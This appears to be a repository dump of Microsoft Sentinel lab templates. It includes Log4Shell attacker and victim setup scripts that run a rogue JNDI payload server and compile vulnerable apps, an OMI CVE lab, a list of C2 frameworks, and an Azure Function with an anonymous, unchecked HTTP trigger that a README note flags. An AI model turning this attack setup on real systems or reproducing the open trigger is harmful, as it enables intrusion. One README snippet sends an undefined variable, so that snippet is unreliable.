├── .gitignore ├── LICENSE ├── MSSentinel2GoUtils.psm1 ├── README.md ├── grocery-list ├── CEF-Log-Analytics-Agent │ ├── README.md │ ├── azuredeploy.json │ ├── samples │ │ ├── cef_replace.yaml │ │ └── paloAltoMortoRDPRequest.yaml │ └── uidefinition.json ├── Custom-Logs-Pipeline │ ├── README.md │ ├── azuredeploy.json │ └── functionApp │ │ ├── azuredeploy.json │ │ ├── functionAppPackage.zip │ │ └── functionAppPackage │ │ ├── .gitignore │ │ ├── AzureLogAnalytics │ │ ├── function.json │ │ └── run.ps1 │ │ ├── HTTPTrigger │ │ ├── function.json │ │ └── run.ps1 │ │ ├── Orchestrator │ │ ├── function.json │ │ └── run.ps1 │ │ ├── host.json │ │ ├── profile.ps1 │ │ ├── proxies.json │ │ └── requirements.psd1 ├── Deception │ ├── README.md │ ├── azuredeploy.json │ └── honeytokenSolution.json ├── Linux │ ├── README.md │ ├── azuredeploy.json │ ├── demos │ │ ├── CVE-2021-38647-OMI │ │ │ ├── README.md │ │ │ ├── azuredeploy.json │ │ │ └── uidefinition.json │ │ ├── CVE-2021-44228-Log4Shell │ │ │ ├── README.md │ │ │ ├── Set-Up-Attacker.sh │ │ │ ├── Set-Up-Victim.sh │ │ │ └── azuredeploy.json │ │ └── Sysmon-For-Linux │ │ │ ├── README.md │ │ │ ├── azuredeploy.json │ │ │ └── uidefinition.json │ └── uidefinition.json ├── Win10-AD-ADFS │ ├── README.md │ ├── azuredeploy.json │ └── uidefinition.json ├── Win10-AD-MXS │ ├── README.md │ ├── azuredeploy.json │ └── uidefinition.json ├── Win10-AD-WEC │ ├── README.md │ ├── azuredeploy.json │ └── uidefinition.json ├── Win10-AD │ ├── README.md │ ├── azuredeploy.json │ └── uidefinition.json ├── Win10-LDAPFW │ ├── README.md │ ├── azuredeploy.json │ └── linkedtemplates │ │ └── customScriptExtension.json ├── Win10-PAN-FW │ ├── README.md │ ├── azuredeploy.json │ └── uidefinition.json ├── Win10-RPCFW │ ├── README.md │ ├── azuredeploy.json │ └── linkedtemplates │ │ └── customScriptExtension.json ├── Win10 │ ├── README.md │ ├── azuredeploy.json │ ├── demos │ │ ├── README.md │ │ ├── Sysmon-For-Windows │ │ │ └── README.md │ │ ├── Win10-Azure-Sentinel-Basic.json │ 
│ ├── Win10-DCR-AzureResource.json │ │ └── Win10-DCR-DeploymentScript.json │ └── uidefinition.json └── custom-log-pipeline │ ├── README.md │ ├── azuredeploy.json │ ├── linkedtemplates │ └── customScript.json │ ├── logstash │ ├── Dockerfile │ ├── config │ │ └── logstash.yml │ ├── docker-compose.yml │ ├── pipeline │ │ ├── eventhub-input.conf │ │ ├── json-file-input.conf │ │ ├── loganalytics-output-usgov.conf │ │ └── loganalytics-output.conf │ └── scripts │ │ └── logstash-entrypoint.sh │ ├── scripts │ ├── Get-Security-Datasets.sh │ └── Install-Logstash.sh │ └── uidefinition.json ├── microsoft-sentinel ├── README.md ├── azuredeploy.json ├── azuredeploy.parameters.json ├── linkedtemplates │ ├── alerts │ │ └── scheduledAlerts.json │ ├── customScript.json │ ├── customScriptExtension.json │ ├── data-collection-rules │ │ ├── association.json │ │ ├── creation-azureresource.json │ │ ├── creation-deploymentscript.json │ │ └── rules │ │ │ ├── ossem-attack │ │ │ ├── README.md │ │ │ ├── active-directory.xml │ │ │ ├── command.xml │ │ │ ├── file.xml │ │ │ ├── logon-session.xml │ │ │ ├── network-share.xml │ │ │ ├── network-traffic.xml │ │ │ ├── ossem-attack.json │ │ │ ├── process.xml │ │ │ ├── scheduled-job.xml │ │ │ ├── service.xml │ │ │ ├── user-account.xml │ │ │ └── windows-registry.xml │ │ │ └── palantir │ │ │ ├── ADFS.xml │ │ │ ├── Account-Lockout.xml │ │ │ ├── Account-Management.xml │ │ │ ├── Active-Directory.xml │ │ │ ├── Application-Crashes.xml │ │ │ ├── Applocker.xml │ │ │ ├── Authentication.xml │ │ │ ├── Autoruns.xml │ │ │ ├── Bits-Client.xml │ │ │ ├── Certificate-Authority.xml │ │ │ ├── Code-Integrity.xml │ │ │ ├── DNS.xml │ │ │ ├── Device-Guard.xml │ │ │ ├── Drivers.xml │ │ │ ├── Duo-Security.xml │ │ │ ├── EMET.xml │ │ │ ├── Event-Log-Diagnostics.xml │ │ │ ├── Explicit-Credentials.xml │ │ │ ├── Exploit-Guard-ASR.xml │ │ │ ├── Exploit-Guard-CFA.xml │ │ │ ├── Exploit-Guard-EP.xml │ │ │ ├── Exploit-Guard-NP.xml │ │ │ ├── External-Devices.xml │ │ │ ├── Firewall.xml │ │ │ ├── 
Group-Policy-Errors.xml │ │ │ ├── Kerberos.xml │ │ │ ├── Log-Deletion-Security.xml │ │ │ ├── Log-Deletion-System.xml │ │ │ ├── MSI-Packages.xml │ │ │ ├── Microsoft-Office.xml │ │ │ ├── NTLM.xml │ │ │ ├── Object-Manipulation.xml │ │ │ ├── Operating-System.xml │ │ │ ├── Powershell.xml │ │ │ ├── Print.xml │ │ │ ├── Privilege-Use.xml │ │ │ ├── Process-Execution.xml │ │ │ ├── README.md │ │ │ ├── Registry.xml │ │ │ ├── Services.xml │ │ │ ├── Shares.xml │ │ │ ├── Smart-Card.xml │ │ │ ├── Software-Restriction-Policies.xml │ │ │ ├── Sysmon.xml │ │ │ ├── System-Time-Change.xml │ │ │ ├── Task-Scheduler.xml │ │ │ ├── Terminal-Services.xml │ │ │ ├── WMI.xml │ │ │ ├── Windows-Defender.xml │ │ │ ├── Windows-Diagnostics.xml │ │ │ ├── Windows-Updates.xml │ │ │ └── Wireless.xml │ ├── data-connectors │ │ ├── README.md │ │ ├── aatp.json │ │ ├── allConnectors.json │ │ ├── awsCloudTrail.json │ │ ├── azureADDiagnosticSettings.json │ │ ├── azureADIdentityProtection.json │ │ ├── azureActivityLog.json │ │ ├── azureSecurityCenter.json │ │ ├── dnsAnalytics.json │ │ ├── m365defender.json │ │ ├── m365defenderAPI.json │ │ ├── mcas.json │ │ ├── mdatp.json │ │ ├── office365.json │ │ ├── officeATP.json │ │ ├── securityEvents.json │ │ ├── syslogCollection.json │ │ ├── threatIntelligence.json │ │ └── windowsFirewall.json │ ├── log-analytics │ │ ├── additionalSolutions.json │ │ ├── functions.json │ │ ├── iisLogsDataSource.json │ │ ├── syslogDataSources.json │ │ └── winDataSources.json │ ├── parsers │ │ ├── winLDAPFWLogs.json │ │ └── winRPCFWLogs.json │ └── security-center │ │ └── winSecurityAuditing.json ├── scripts │ ├── Create-DataCollectionRules.ps1 │ └── Enable-ScheduledAlerts.ps1 └── uidefinition.json └── resources ├── images ├── cef-log-analytics-agent_01_azure_sentinel.PNG ├── cef-log-analytics-agent_02_cef_data_connector.PNG ├── cef-log-analytics-agent_03_sample_cef_event.PNG ├── cef-log-analytics-agent_04_cef_azure_bastion.png ├── cef-log-analytics-agent_05_custom_cef_event.PNG ├── 
lab_environment_omigod.png ├── linux-sysmon-azure-sentinel.png ├── linux-sysmon-service-status.png ├── linux-sysmon-tail-syslog.png ├── linux-sysmon-tail-sysmonlogview.png ├── linux-sysmon-template-params.png ├── log4jshell-deployment-resources.png ├── log4jshell-trigger-rce-basicjar-reverseshell-pcap.png ├── log4jshell-trigger-rce-basicjar-reverseshell3.png ├── log4jshell-trigger-rce-basicjar-reverseshell4.png ├── log4jshell-trigger-rce-basicjar-sentinel-file-creation.png ├── log4jshell-trigger-rce-basicjar-sysmon-process-create.png ├── log4jshell-validate-sysmon.png ├── logo.png ├── logo2.png ├── oms_scx_verbose_logging.png ├── sysmon-azure-sentinel-query.png ├── sysmon-azure-sentinel.png ├── win10-ad-mxs_01_exchange_admin_center_login.png ├── win10-ad-mxs_02_exchange_admin_center_portal.png ├── win10-ad-mxs_03_owa_login.png ├── win10-ad-mxs_04_owa_inbox.png ├── win10-ad-mxs_05_owa_new_message.png ├── win10-ad-mxs_06_owa_message_received.png ├── win10-ldapfw_check_events.png ├── win10-ldapfw_query_ldap_firewall.png ├── win10-rpcfw_block_replication.png ├── win10-rpcfw_block_replication_event.png ├── win10-rpcfw_check_events.png ├── win10-rpcfw_check_mssentinel.png ├── win10-rpcfw_forwarded_events.png ├── win10-rpcfw_mk_dcsync.png ├── win10-rpcfw_mk_dcsync_execution.png ├── win10-rpcfw_query_rpcfirewall_limit10.png ├── win10-rpcfw_query_rpcfirewall_where_replication.png ├── win10-rpcfw_update_rules.png ├── win10-rpcfw_windows_subscriptions.png └── win10-rpcfw_windows_subscriptions_queries.png ├── samples ├── analytic-rules │ └── sandcats.json ├── data │ ├── dataset-sample-one.tar.gz │ ├── dataset-sample-small.tar.gz │ └── dataset-sample-two.tar.gz └── kafkacat │ └── kafkacat-Example.conf └── scripts ├── Convert-AnalyticRules.py ├── Get-AnalyticRules.sh ├── Get-DataConnectors.sh ├── Get-DataSources.sh ├── Grant-AzADAppPermissions.ps1 ├── Kafkacat-Mordor-Eventhub.sh ├── New-AzADAppRegistration.ps1 ├── New-ManagedIdentity.ps1 ├── Post-AnalyticRules.sh ├── 
Post-AnalyticRules_Backup.sh └── Set-WinEventCollectionTier.sh /.gitignore: -------------------------------------------------------------------------------- 1 | **/scratchpad.ps1 2 | -------------------------------------------------------------------------------- /MSSentinel2GoUtils.psm1: -------------------------------------------------------------------------------- 1 | $scripts = @(Get-ChildItem -Path $PSScriptRoot\resources\scripts\*.ps1 -ErrorAction SilentlyContinue) 2 | 3 | foreach ($script in $scripts) { 4 | try { 5 | . $script.FullName 6 | } catch { 7 | Write-Error "Failed to import $($script.FullName): $_" 8 | } 9 | } -------------------------------------------------------------------------------- /grocery-list/CEF-Log-Analytics-Agent/samples/cef_replace.yaml: -------------------------------------------------------------------------------- 1 | SRCTESTIP: 1.2.3.4 2 | DSTTESTIP: 10.0.0.1 -------------------------------------------------------------------------------- /grocery-list/CEF-Log-Analytics-Agent/samples/paloAltoMortoRDPRequest.yaml: -------------------------------------------------------------------------------- 1 | name: PAN Morto RDP Request 2 | platform: Palo Alto Networks 3 | priority: 4 | facility: local4 5 | level: warn 6 | event: 0|Palo Alto Networks|PAN-OS|9.1.0-h3|Morto RDP Request Traffic(13274)|THREAT|2|rt=DATETIME deviceExternalId=RANDOMID src=SRCTESTIP dst=DSTTESTIP sourceTranslatedAddress=DSTTESTIP destinationTranslatedAddress=SRCTESTIP cs1Label=Rule cs1=RDP Inbound suser= duser= app=ms-rdp cs3Label=Virtual System cs3=vsys1 cs4Label=Source Zone cs4=Untrust cs5Label=Destination Zone cs5=Trust deviceInboundInterface=ethernet1/1 deviceOutboundInterface=ethernet1/2 cs6Label=LogProfile cs6=default cn1Label=SessionID cn1=86053 cnt=1 spt=2687 dpt=3389 sourceTranslatedPort=51475 destinationTranslatedPort=3389 flexString1Label=Flags flexString1=0x402000 proto=tcp act=alert request="" cs2Label=URL Category cs2=any flexString2Label=Direction 
flexString2=client-to-server PanOSActionFlags=0x2000000000000000 externalId=2316 cat=Morto RDP Request Traffic(13274) fileId=0 PanOSDGl1=0 PanOSDGl2=0 PanOSDGl3=0 PanOSDGl4=0 PanOSVsysName= dvchost=pannwfusiondemo PanOSSrcUUID= PanOSDstUUID= PanOSTunnelID=0 PanOSMonitorTag= PanOSParent SessionID=0 PanOSParentStartTime= PanOSTunnelType=N/A PanOSThreatCategory=net-worm PanOSContentVer=AppThreat-8224-5855 PanOSAssocID=0 PanOSPPID=4294967295 PanOSHTTPHeader="personal-sites-and-blogs,high-risk" PanOSURLCatList="personal-sites-and-blogs,high-risk" PanOSRuleUUID=c60266c3-fcfd-4f99-b921-54d5aaae7a54 PanOSHTTP2Con=0 -------------------------------------------------------------------------------- /grocery-list/Custom-Logs-Pipeline/README.md: -------------------------------------------------------------------------------- 1 | # Custom Logs Pipeline 2 | 3 | [![Deploy to Azure](https://aka.ms/deploytoazurebutton)](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FMicrosoft-Sentinel2Go%2Fmaster%2Fgrocery-list%2FCustom-Logs-Pipeline%2Fazuredeploy.json) 4 | 5 | ## Send Data 6 | 7 | ### Define Orchestrator Uri 8 | 9 | ```PowerShell 10 | $orchestrator = 'https://.azurewebsites.net/api/orchestrators/Orchestrator' 11 | ``` 12 | 13 | ### Prepare Request 14 | 15 | ```PowerShell 16 | $SimulationRequest = @{ 17 | title = 'Proof of Concept' 18 | destination = 'AzureLogAnalytics' 19 | datasets = @( 20 | @{ 21 | number = 1 22 | eventLogUrl = 'https://github.com/OTRF/Security-Datasets/raw/SecurityDatasets2.0/datasets/atomic/windows/190518-RegKeyModification-WDigestDowngrade/WORKSTATION6_Windows_Security.zip' 23 | eventSourceName = 'Microsoft-Windows-Security-Auditing' 24 | } 25 | ) 26 | } 27 | ``` 28 | 29 | ### Prepare Body 30 | 31 | ```PowerShell 32 | $params = @{ 33 | Uri = $orchestrator 34 | Method = "Post" 35 | Body = $shippingRequest | Convertto-json -Depth 10 36 | ContentType = 'application/json' 37 | Verbose = $true 38 | } 39 | ``` 
### Send Request

> **Security note:** the function app's HTTP trigger is deployed with `"authLevel": "anonymous"` on the route `orchestrators/{FunctionName}` (see `HTTPTrigger/function.json`), `HTTPTrigger/run.ps1` passes that route parameter unchecked to `Start-NewOrchestration`, and the orchestrator forwards the caller-supplied `eventLogUrl` to the activity function. Anyone who can reach the app URL can therefore start orchestrations against URLs of their choosing and push data into your workspace. Before using this outside a disposable lab, switch `authLevel` to `function` (or front the app with App Service authentication and network restrictions) and have `run.ps1` reject any `FunctionName` other than `Orchestrator`.
-------------------------------------------------------------------------------- /grocery-list/Custom-Logs-Pipeline/functionApp/functionAppPackage/HTTPTrigger/run.ps1: -------------------------------------------------------------------------------- 1 | using namespace System.Net 2 | 3 | # Input bindings are passed in via param block. 4 | param($Request, $TriggerMetadata) 5 | 6 | # Write to the Azure Functions log stream. 7 | Write-Host "PowerShell HTTP trigger function processed a request." 8 | 9 | $FunctionName = $Request.Params.FunctionName 10 | $OrchestratorInputs = $Request.Body 11 | 12 | if ($OrchestratorInputs -is [HashTable]) { 13 | Write-Host "Converting HashTable to JSON object" 14 | $OrchestratorInputs = $OrchestratorInputs | ConvertTo-Json -Depth 10 15 | } 16 | 17 | $InstanceId = Start-NewOrchestration -FunctionName $FunctionName -InputObject $OrchestratorInputs 18 | Write-Host "Started orchestration with ID = '$InstanceId'" 19 | 20 | $Response = New-OrchestrationCheckStatusResponse -Request $Request -InstanceId $InstanceId 21 | Push-OutputBinding -Name Response -Value $Response -------------------------------------------------------------------------------- /grocery-list/Custom-Logs-Pipeline/functionApp/functionAppPackage/Orchestrator/function.json: -------------------------------------------------------------------------------- 1 | { 2 | "bindings": [ 3 | { 4 | "name": "Context", 5 | "type": "orchestrationTrigger", 6 | "direction": "in" 7 | } 8 | ] 9 | } 10 | -------------------------------------------------------------------------------- /grocery-list/Custom-Logs-Pipeline/functionApp/functionAppPackage/Orchestrator/run.ps1: -------------------------------------------------------------------------------- 1 | param($Context) 2 | 3 | $ErrorActionPreference = "Stop" 4 | 5 | $dataShippingRequest = $Context.Input | ConvertFrom-Json -ASHashTable 6 | 7 | # Set output variable to aggregate all outputs 8 | $output = [ordered]@{} 9 | 10 | # Current event 
providers that would send data to a built-in table 11 | $eventToTable = @{ 12 | 'Microsoft-Windows-Sysmon' = "WindowsEvent" 13 | 'Service Control Manager' = 'WindowsEvent' 14 | 'Microsoft-Windows-Directory-Services-SAM' = 'WindowsEvent' 15 | 'Microsoft-Windows-WMI-Activity' = 'WindowsEvent' 16 | 'Microsoft-Windows-Security-Auditing' = 'SecurityEvent' 17 | } 18 | 19 | # Generating simulation id 20 | $newGuid = (new-guid).guid 21 | 22 | # Defining durable activity name 23 | $destinationTable = @('AzureLogAnalytics') 24 | $destinationSet = $dataShippingRequest.destination 25 | if ($destinationSet -notin $destinationTable) { 26 | Write-Error "[!] $destinationSet not allowed. Only 'AzureLogAnalytics' allowed." 27 | } 28 | else { 29 | $durableActivityName = $destinationSet 30 | } 31 | 32 | $output = @{ 33 | Title = $dataShippingRequest.title 34 | executions = [ordered]@{} 35 | } 36 | 37 | foreach ($dataSample in $dataShippingRequest.datasets) { 38 | # Set table name 39 | if ($eventToTable.ContainsKey($dataSample.eventSourceName)){ 40 | $tableName = $eventToTable[$dataSample.eventSourceName] 41 | } 42 | else { 43 | $tableName = "CustomTable" 44 | } 45 | 46 | # Preparing execution 47 | $executorInput = @{ 48 | EventLogUrl = $dataSample.eventLogUrl 49 | TableName = $tableName 50 | SimulationId = $newGuid 51 | } | ConvertTo-Json 52 | 53 | Write-Host ($executorInput | Out-String) 54 | 55 | # Invoke activity function 56 | $output['executions']["$($dataSample.number)"] = Invoke-DurableActivity -FunctionName $durableActivityName -Input $executorInput | ConvertTo-Json -Depth 1 57 | } 58 | $output -------------------------------------------------------------------------------- /grocery-list/Custom-Logs-Pipeline/functionApp/functionAppPackage/host.json: -------------------------------------------------------------------------------- 1 | { 2 | "version": "2.0", 3 | "logging": { 4 | "applicationInsights": { 5 | "samplingSettings": { 6 | "isEnabled": true, 7 | "excludedTypes": 
"Request" 8 | } 9 | } 10 | }, 11 | "extensionBundle": { 12 | "id": "Microsoft.Azure.Functions.ExtensionBundle", 13 | "version": "[2.*, 3.0.0)" 14 | }, 15 | "managedDependency": { 16 | "enabled": true 17 | } 18 | } -------------------------------------------------------------------------------- /grocery-list/Custom-Logs-Pipeline/functionApp/functionAppPackage/profile.ps1: -------------------------------------------------------------------------------- 1 | # Azure Functions profile.ps1 2 | # 3 | # This profile.ps1 will get executed every "cold start" of your Function App. 4 | # "cold start" occurs when: 5 | # 6 | # * A Function App starts up for the very first time 7 | # * A Function App starts up after being de-allocated due to inactivity 8 | # 9 | # You can define helper functions, run commands, or specify environment variables 10 | # NOTE: any variables defined that are not environment variables will get reset after the first execution 11 | 12 | # Authenticate with Azure PowerShell using MSI. 13 | # Remove this if you are not planning on using MSI or Azure PowerShell. 14 | #if ($env:MSI_SECRET) { 15 | # Disable-AzContextAutosave -Scope Process | Out-Null 16 | # Connect-AzAccount -Identity 17 | #} 18 | 19 | # Uncomment the next line to enable legacy AzureRm alias in Azure PowerShell. 20 | # Enable-AzureRmAlias 21 | 22 | # You can also define functions or aliases that can be referenced in any of your PowerShell functions. 
23 | -------------------------------------------------------------------------------- /grocery-list/Custom-Logs-Pipeline/functionApp/functionAppPackage/proxies.json: -------------------------------------------------------------------------------- 1 | { 2 | "$schema": "http://json.schemastore.org/proxies", 3 | "proxies": {} 4 | } 5 | -------------------------------------------------------------------------------- /grocery-list/Custom-Logs-Pipeline/functionApp/functionAppPackage/requirements.psd1: -------------------------------------------------------------------------------- 1 | # This file enables modules to be automatically managed by the Functions service. 2 | # See https://aka.ms/functionsmanageddependency for additional information. 3 | # 4 | @{ 5 | # For latest supported version, go to 'https://www.powershellgallery.com/packages/Az'. 6 | # To use the Az module in your function app, please uncomment the line below. 7 | # 'Az' = '6.*' 8 | } -------------------------------------------------------------------------------- /grocery-list/Deception/README.md: -------------------------------------------------------------------------------- 1 | # Microsoft Sentinel + Azure Key Vault Honey Tokens 2 | 3 | ## Create Unique Azure Function Application Name 4 | 5 | ```PowerShell 6 | $functionAppName = (-join ('honeytoken',-join ((65..90) + (97..122) | Get-Random -Count 10 | % {[char]$_}))).ToLower() 7 | ``` -------------------------------------------------------------------------------- /grocery-list/Linux/README.md: -------------------------------------------------------------------------------- 1 | # Microsoft Sentinel + Linux (Ubuntu, CentOS, Red Hat) 2 | 3 | [![Deploy to Azure](https://aka.ms/deploytoazurebutton)](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FMicrosoft-Sentinel2Go%2Fmaster%2Fgrocery-list%2FLinux%2Fazuredeploy.json) 4 | [![Deploy to Azure 
Gov](https://aka.ms/deploytoazuregovbutton)](https://portal.azure.us/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FMicrosoft-Sentinel2Go%2Fmaster%2Fgrocery-list%2FLinux%2Fazuredeploy.json) 5 | 6 | ## Grocery Items 7 | 8 | * Microsoft Sentinel 9 | * Would you like to Bring-Your-Own Microsoft Sentinel?. 10 | * If so, set the `workspaceId` and `workspaceKey` parameters of your own workspace. 11 | * Linux VMs 12 | * `Ubuntu` 13 | * `Centos` [OPTIONAL] 14 | * `Red hat` [OPTIONAL] 15 | * Windows [Microsoft Monitoring Agent](https://docs.microsoft.com/en-us/services-hub/health/mma-setup) installed 16 | * It connects to the Microsoft Log Analytics workspace define in the template. 17 | * Syslog Data Connection enabled 18 | * Linux Syslog Facilities 19 | * `auth` 20 | * `authpriv` 21 | * `cron` 22 | * `daemon` 23 | * `ftp` 24 | * `kern` 25 | * `user` 26 | * [OPTIONAL] Command and Control (c2) options: 27 | * `empire` 28 | * `covenant` 29 | * `caldera` 30 | * `metasploit` 31 | * `shad0w` 32 | -------------------------------------------------------------------------------- /grocery-list/Linux/demos/CVE-2021-38647-OMI/README.md: -------------------------------------------------------------------------------- 1 | # CVE-2021-38647 Research Lab Environment 2 | 3 | [![Deploy to Azure](https://aka.ms/deploytoazurebutton)](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FMicrosoft-Sentinel2Go%2Fmaster%2Fgrocery-list%2FLinux%2Fdemos%2FCVE-2021-38647-OMI%2Fazuredeploy.json) 4 | 5 | ## Metadata 6 | 7 | * **Author:** [Roberto Rodriguez (@Cyb3rWard0g)](https://twitter.com/Cyb3rWard0g) 8 | * **Deployment time:** 5mins 9 | * **Initial time for log collection (Syslog):** 5-10 mins 10 | 11 | ## Grocery Items 12 | 13 | * Microsoft Sentinel 14 | * Would you like to Bring-Your-Own Microsoft Sentinel?. 15 | * If so, set the `workspaceId` and `workspaceKey` parameters of your own workspace. 
16 | * Linux VMs 17 | * `Ubuntu 20` 18 | * [OMS Agent for Linux](https://github.com/microsoft/OMS-Agent-for-Linux) installed 19 | * It connects to the Microsoft Log Analytics workspace defined in the template. 20 | * [OMI version 1.6.8.0](https://github.com/microsoft/omi/releases/tag/v1.6.8-0) installed 21 | * [Syslog Data Connector](https://docs.microsoft.com/en-us/azure/sentinel/connect-syslog) enabled 22 | * Linux Syslog Facilities collected 23 | * `user` 24 | * [OMS Auditd Plugin installed](https://github.com/microsoft/OMS-Auditd-Plugin) 25 | * [AUOMS outconf](https://github.com/OTRF/Blacksmith/blob/master/resources/configs/auoms-outconf/syslog.conf) 26 | * [AUOMS rules](https://github.com/OTRF/Blacksmith/blob/master/resources/configs/auoms-rules/mstic-research.rules) 27 | 28 | ## Validate Environment 29 | 30 | ssh to boxes deployed and confirm: 31 | * Version of OMI is at `1.6.8.0` 32 | * Ports 5986 and 5985 are open 33 | * Test a [basic POC](https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure) 34 | 35 | ![](../../../../resources/images/lab_environment_omigod.png) 36 | 37 | ## Additional Telemetry - SCX Verbose Logging 38 | 39 | Set logging with the following commands: 40 | 41 | ``` 42 | /opt/microsoft/scx/bin/tools/scxadmin -log-set all verbose 43 | ``` 44 | 45 | Explore messages 46 | 47 | ``` 48 | tail -f /var/opt/microsoft/scx/log/scx.log 49 | ``` 50 | 51 | ![](../../../../resources/images/oms_scx_verbose_logging.png) 52 | 53 | Set all logging back to `INFO` 54 | 55 | ``` 56 | /opt/microsoft/scx/bin/tools/scxadmin -log-set all intermediate 57 | ``` 58 | -------------------------------------------------------------------------------- /grocery-list/Linux/demos/CVE-2021-44228-Log4Shell/Set-Up-Attacker.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | # Author: Roberto Rodriguez (@Cyb3rWard0g) 4 | # License: MIT 5 | 6 | # *********** Install Docker and Docker-Compose *********** 7 | 
./Install-Docker.sh 8 | 9 | # *********** Cloning log4shell Lab *************** 10 | git clone https://github.com/Cyb3rWard0g/log4jshell-lab /opt/log4jshell-lab 11 | 12 | # *********** Instal Pip3 ******** 13 | apt install -y python3-pip 14 | 15 | cd /opt/log4jshell-lab/attacker/dns-server 16 | pip3 install -r Requirements.txt 17 | 18 | # *********** Build and start Rogue JNDI ************* 19 | HOST_IP=$(ip route get 1 | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" | tail -1) 20 | 21 | # *********** Deploy Lab Environment *********** 22 | cd /opt/log4jshell-lab/attacker/rogue-jndi 23 | 24 | docker build . -t rogue-jndi 25 | docker run --rm -tid --name rogue-jndi -e PAYLOAD_IP=$HOST_IP -p 1389:1389 -p 8888:8888 rogue-jndi -------------------------------------------------------------------------------- /grocery-list/Linux/demos/CVE-2021-44228-Log4Shell/Set-Up-Victim.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | # Author: Roberto Rodriguez (@Cyb3rWard0g) 4 | # License: MIT 5 | 6 | # *********** Install Docker and Docker-Compose *********** 7 | ./Install-Docker.sh 8 | 9 | # *********** Cloning log4shell Lab *************** 10 | git clone https://github.com/Cyb3rWard0g/log4jshell-lab /opt/log4jshell-lab 11 | 12 | # *********** Install Tomcat ************** 13 | cd /opt/log4jshell-lab/victim/tomcat 14 | sh Install-Tomcat.sh 15 | 16 | # *********** Compile Vulnerable Applications ************** 17 | cd /opt/log4jshell-lab/victim/vuln-apps 18 | chmod +x Compile-Apps.sh 19 | sh Compile-Apps.sh 20 | 21 | # Restart Tomcat Service 22 | service tomcat stop 23 | service tomcat start -------------------------------------------------------------------------------- /grocery-list/Linux/demos/Sysmon-For-Linux/README.md: -------------------------------------------------------------------------------- 1 | # Sysmon For Linux Lab Environment 2 | 3 | [![Deploy to 
Azure](https://aka.ms/deploytoazurebutton)](https://portal.azure.com/#create/Microsoft.Template/uri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FMicrosoft-Sentinel2Go%2Fmaster%2Fgrocery-list%2FLinux%2Fdemos%2FSysmon-For-Linux%2Fazuredeploy.json/createUIDefinitionUri/https%3A%2F%2Fraw.githubusercontent.com%2FOTRF%2FMicrosoft-Sentinel2Go%2Fmaster%2Fgrocery-list%2FLinux%2Fdemos%2FSysmon-For-Linux%2Fuidefinition.json) 4 | 5 | ## Metadata 6 | 7 | * **Author:** [Roberto Rodriguez (@Cyb3rWard0g)](https://twitter.com/Cyb3rWard0g) 8 | * **Deployment time:** 5mins 9 | * **Initial time for log collection (Syslog):** 5-10 mins 10 | 11 | ## Grocery Items 12 | 13 | * Microsoft Sentinel 14 | * Would you like to Bring-Your-Own Microsoft Sentinel?. 15 | * If so, set the `workspaceId` and `workspaceKey` parameters of your own workspace. 16 | * Linux VMs 17 | * Distro: `Ubuntu 18.04.6 LTS` - Kernel release: `5.4.0-1059-azure ` 18 | * Distro: `Centos 8.2.2004` - Kernel release: `4.18.0-193.28.1.el8_2.x86_64` 19 | * Distro: `Red Hat 8.2` - Kernel release: `4.18.0-193.65.2.el8_2.x86_64` 20 | * [Log Analytics Agent for Linux](https://github.com/microsoft/OMS-Agent-for-Linux) installed 21 | * It connects to the Microsoft Log Analytics workspace defined in the template. 22 | * [Syslog Data Connector](https://docs.microsoft.com/en-us/azure/sentinel/connect-syslog) enabled 23 | * Linux Syslog Facilities collected 24 | * `user` 25 | * [Sysmon for Linux installed]() 26 | * [Sysmon for Linux installer]() 27 | * [Sysmon configuration]() 28 | 29 | ## Validate Environment 30 | 31 | ssh to boxes deployed and confirm the `Sysmon` service is running: 32 | 33 | ```bash 34 | systemctl status sysmon 35 | ``` 36 | 37 | ![](../../../../resources/images/linux-sysmon-service-status.png) 38 | 39 | ## Explore Syslog Events 40 | 41 | You can explore Sysmon events from the Syslog log. 
42 | 43 | ```bash 44 | tail –f /var/log/Syslog 45 | ``` 46 | 47 | ![](../../../../resources/images/linux-sysmon-tail-syslog.png) 48 | 49 | ## Explore Sysmon Events via sysmonLogView 50 | 51 | Sysmon also comes with a binary named sysmonLogView to explore sysmon events in a friendly format. Run the following commands to explore Sysmon event id 1 (ProcessCreate) events locally: 52 | 53 | ```bash 54 | sudo tail -f /var/log/syslog | sudo /opt/sysmon/sysmonLogView -e 1 55 | ``` 56 | 57 | ![](../../../../resources/images/linux-sysmon-tail-sysmonlogview.png) 58 | 59 | ## Explore Events in Microsoft Sentinel 60 | 61 | You can query Sysmon for Linux logs by using the Syslog table with the following Kusto query: 62 | 63 | ``` 64 | Syslog 65 | | extend EventID = parse_xml(SyslogMessage).Event.System.EventID 66 | | extend EventData = parse_xml(SyslogMessage).Event.EventData.Data 67 | | mv-expand bagexpansion=array EventData 68 | | evaluate bag_unpack(EventData) 69 | | extend Key=tostring(['@Name']), Value=['#text'] 70 | | evaluate pivot( 71 | Key, any(Value), TimeGenerated, TenantId, SourceSystem, 72 | EventID, Computer, Facility, SeverityLevel, HostIP, MG, Type, _ResourceId 73 | ) 74 | | summarize count() by tostring(EventID) 75 | ``` 76 | 77 | Additionally, as part of the [ASIM](https://docs.microsoft.com/en-us/azure/sentinel/normalization-content) (Microsoft Sentinel Information Model) project, we have created parsers for [Sysmon for Linux](https://github.com/Azure/Azure-Sentinel/tree/master/Parsers/ASim%20Sysmon%20for%20Linux). The parsers get imported automatically by the template we use to deploy the lab environment. 
